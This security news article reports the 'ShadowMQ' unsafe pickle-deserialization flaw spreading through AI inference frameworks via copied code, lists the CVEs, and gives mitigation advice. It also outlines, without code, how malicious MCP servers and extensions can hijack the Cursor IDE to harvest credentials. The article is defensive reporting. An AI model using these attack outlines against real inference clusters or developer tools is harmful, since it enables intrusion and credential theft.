
Security researchers have uncovered a widespread vulnerability pattern affecting major AI inference frameworks from Meta, Nvidia, Microsoft, and popular open-source projects. The root cause? Unsafe implementation of ZeroMQ messaging with Python pickle deserialization—a dangerous combination that enables remote code execution across the AI ecosystem.
The Discovery: One Flaw, Multiple Victims
In what cybersecurity researchers are calling the “ShadowMQ” pattern, a systematic investigation by Oligo Security has revealed that critical security vulnerabilities have propagated throughout the artificial intelligence infrastructure ecosystem. The issue isn’t isolated to a single vendor—it spans the entire landscape of AI inference engines that power production machine learning deployments.
Understanding the Technical Root Cause
The Dangerous Combination
At the heart of these vulnerabilities lies an architectural decision that seemed innocuous but proved catastrophic: the use of ZeroMQ’s recv_pyobj() method for network communication. This method automatically deserializes incoming data using Python’s pickle module, which is inherently unsafe when processing untrusted input.
The problem compounds when these ZeroMQ sockets are exposed over network interfaces without proper authentication mechanisms. This combination creates a perfect storm where attackers can inject malicious serialized objects that execute arbitrary code when deserialized on the target system.
How Code Reuse Amplified the Problem
The vulnerability’s reach extends far beyond its origin point due to a common software development practice: code reuse. What began as a single implementation flaw in Meta’s infrastructure became an industry-wide security crisis as developers copied and adapted code between projects.
Security analysis revealed troubling evidence of direct code copying:
- SGLang documentation explicitly acknowledges adaptation from vLLM
- Modular Max Server incorporated vulnerable logic from both vLLM and SGLang
- Nearly identical unsafe patterns appear across different maintainers and organizations
Each time vulnerable code was copied, the security flaw multiplied, creating a cascading effect throughout the AI infrastructure ecosystem.
Affected Platforms and CVE Assignments
Meta’s Llama Framework
The initial vulnerability was discovered in Meta’s Llama large language model framework, tracked as CVE-2024-50050. This flaw carried a CVSS score ranging from 6.3 to 9.3, depending on the specific deployment configuration and exposure level.
Meta has since patched this vulnerability, and complementary fixes have been implemented in the pyzmq Python library that provides the underlying ZeroMQ bindings.
NVIDIA TensorRT-LLM
NVIDIA’s inference optimization framework contained the same vulnerability pattern, assigned CVE-2025-23254 with a CVSS score of 8.8. The company addressed this critical flaw in version 0.18.2 of TensorRT-LLM.
vLLM (Open Source)
The popular open-source inference server vLLM received vulnerability designation CVE-2025-30165 with a CVSS score of 8.0. While not fully patched in the traditional sense, the project has mitigated the issue by switching to the V1 engine as the default configuration.
Modular Max Server
Modular’s Max Server infrastructure was assigned CVE-2025-60455. The company has implemented fixes to address the vulnerability in their platform.
Still at Risk
Two additional platforms remain vulnerable at the time of this publication:
- Microsoft Sarathi-Serve: No patch currently available
- SGLang: Partial mitigation implemented, but incomplete fixes leave residual risk
Attack Scenarios and Impact Assessment
What Attackers Can Achieve
The consequences of successful exploitation are severe and multifaceted:
Infrastructure Compromise: An attacker who successfully exploits these vulnerabilities gains arbitrary code execution on inference nodes. Since inference engines typically run with elevated privileges and access to sensitive resources, this provides a powerful foothold within AI infrastructure.
Lateral Movement: Modern AI deployments operate in clustered environments. Compromising a single inference node can enable lateral movement throughout the cluster, potentially affecting entire machine learning pipelines.
Intellectual Property Theft: AI models represent significant intellectual property investments. Attackers with code execution capabilities can exfiltrate proprietary models, training data, and algorithmic implementations.
Resource Hijacking: Compromised inference infrastructure presents an attractive target for cryptocurrency mining operations. The high-performance compute resources typical of AI deployments are ideal for cryptomining, and such abuse can persist undetected for extended periods.
Model Poisoning: Beyond simple theft, attackers could potentially manipulate models or inject backdoors that alter inference results in subtle ways, undermining the integrity of AI-powered decisions.
Extended Threat Surface: Development Environments
The Cursor Browser Vulnerability
Parallel research from Knostic has identified additional attack vectors in AI-assisted development environments. Their investigation focused on Cursor’s integrated browser feature and revealed two distinct exploitation paths:
JavaScript Injection via MCP Servers: Attackers can craft malicious Model Context Protocol (MCP) servers that bypass Cursor’s security controls. When executed, these rogue servers inject code that replaces legitimate login interfaces with credential-harvesting phishing pages.
The attack sequence works as follows:
- User downloads and configures a malicious MCP server via an mcp.json file
- The MCP server injects JavaScript into Cursor’s built-in browser
- Injected code redirects users to fake authentication pages
- Credentials are exfiltrated to attacker-controlled infrastructure
Malicious Extension Attacks: Given that Cursor is essentially a fork of Visual Studio Code, it inherits the extension ecosystem’s security challenges. Attackers can develop malicious extensions that inject JavaScript directly into the IDE’s Node.js interpreter.
Once JavaScript execution is achieved within the interpreter context, attackers inherit the IDE’s full privilege set:
- Complete filesystem access
- Ability to modify or replace installed extensions
- Capability to manipulate IDE functions
- Persistence mechanisms that survive IDE restarts
The Broader Implication: Interpreter-Level Compromise
The Cursor vulnerabilities highlight a critical architectural concern that extends beyond individual bugs. When malicious code gains execution within the Node.js interpreter—whether through extensions, MCP servers, or prompt injection—it operates with the same permissions as the IDE itself.
This elevation transforms the development environment into what Knostic describes as a “malware distribution and exfiltration platform.” The compromised IDE can:
- Inject malicious code into projects
- Steal sensitive source code and credentials
- Modify build processes to introduce supply chain compromises
- Establish persistent backdoors in the development workflow
Defense Strategies and Mitigation Guidance
For AI Infrastructure Operators
Immediate Actions:
- Patch Management: Update all inference frameworks to the latest versions that include security fixes
- Network Segmentation: Isolate inference infrastructure behind robust network controls
- Authentication Requirements: Implement strong authentication for all inter-service communication
- Monitoring Implementation: Deploy detection mechanisms for unusual deserialization activity
Long-term Architecture Improvements:
- Replace pickle deserialization with safer alternatives (JSON, Protocol Buffers, etc.)
- Implement principle of least privilege for inference service accounts
- Establish secure channels for inter-process communication
- Regular security audits of custom implementations
For Development Environment Security
IDE Configuration Best Practices:
- Disable Auto-Run Features: Prevent automatic execution of untrusted code
- Extension Vetting: Install only extensions from verified publishers
- MCP Server Auditing: Review source code before deploying MCP servers
- API Key Hygiene: Use minimally-scoped API keys for development tools
- Repository Trust Verification: Validate MCP servers from official, trusted repositories
Data Access Controls:
- Audit which data sources MCP servers can access
- Restrict API permissions to minimal required scope
- Monitor for unusual data access patterns
- Implement logging for all MCP server activities
Industry Response and Lessons Learned
The Velocity Problem
Oligo Security researcher Avi Lumelsky contextualized the issue within the broader AI development landscape: “Projects are moving at incredible speed, and it’s common to borrow architectural components from peers. But when code reuse includes unsafe patterns, the consequences ripple outward fast.”
This observation highlights a fundamental tension in modern AI development. The rapid pace of innovation encourages code sharing and reuse to accelerate progress. However, when security-critical code is copied without thorough review, vulnerabilities propagate at the same velocity as innovation.
Breaking the Chain
The ShadowMQ pattern reveals the need for improved security practices in fast-moving technology sectors:
Code Review Culture: Organizations must maintain rigorous security review processes even when adapting code from reputable sources. The origin of code doesn’t guarantee its security posture.
Secure Defaults: Framework developers should prioritize secure-by-default configurations. The fact that unsafe deserialization patterns persisted across multiple projects suggests that secure alternatives weren’t sufficiently obvious or accessible.
Supply Chain Awareness: Understanding the provenance and security characteristics of incorporated code is essential. Teams should maintain awareness of which external components include security-sensitive functionality.
Looking Forward: Securing AI Infrastructure
Industry-Wide Implications
These vulnerabilities underscore that AI infrastructure faces unique security challenges at the intersection of high-performance computing, distributed systems, and machine learning. As AI deployment scales, the attack surface expands proportionally.
Recommendations for Framework Developers
- Security-First Design: Prioritize security considerations in architectural decisions, particularly for network-facing components
- Safer Serialization: Move away from pickle and similar unsafe serialization formats for any network-facing interfaces
- Documentation: Clearly document security considerations when providing reference implementations
- Security Audits: Conduct regular third-party security assessments of critical infrastructure components
Call to Action
Organizations deploying AI inference infrastructure should:
- Conduct immediate vulnerability assessments of their inference platforms
- Review network exposure of inference services
- Implement comprehensive monitoring for exploitation attempts
- Establish incident response procedures specific to AI infrastructure compromise
Conclusion
The ShadowMQ vulnerability pattern serves as a stark reminder that even in cutting-edge technology domains, fundamental security principles remain critical. The propagation of unsafe deserialization practices through code reuse demonstrates how quickly vulnerabilities can spread in interconnected software ecosystems.
As artificial intelligence becomes increasingly central to business operations and critical infrastructure, securing AI systems must receive commensurate attention. The industry must balance the velocity of innovation with the rigor of security engineering—a challenge that will only grow more pressing as AI deployment accelerates.
Technical References
CVE Identifiers:
- CVE-2024-50050: Meta Llama Framework (Patched)
- CVE-2025-23254: NVIDIA TensorRT-LLM (Fixed in v0.18.2)
- CVE-2025-30165: vLLM (Mitigated via V1 engine default)
- CVE-2025-60455: Modular Max Server (Fixed)
Vulnerability Source:
- Oligo Security Research Report: “ShadowMQ: How Code Reuse Spread Critical Vulnerabilities Across the AI Ecosystem”
- Knostic Security Research: “MCP Hijacked: Cursor Browser Exploitation”
Affected Technologies:
- ZeroMQ (pyzmq library)
- Python pickle module
- Various AI inference frameworks and development tools
This article is based on security research published by Oligo Security and Knostic. Organizations using affected technologies should consult vendor security advisories and apply recommended patches immediately.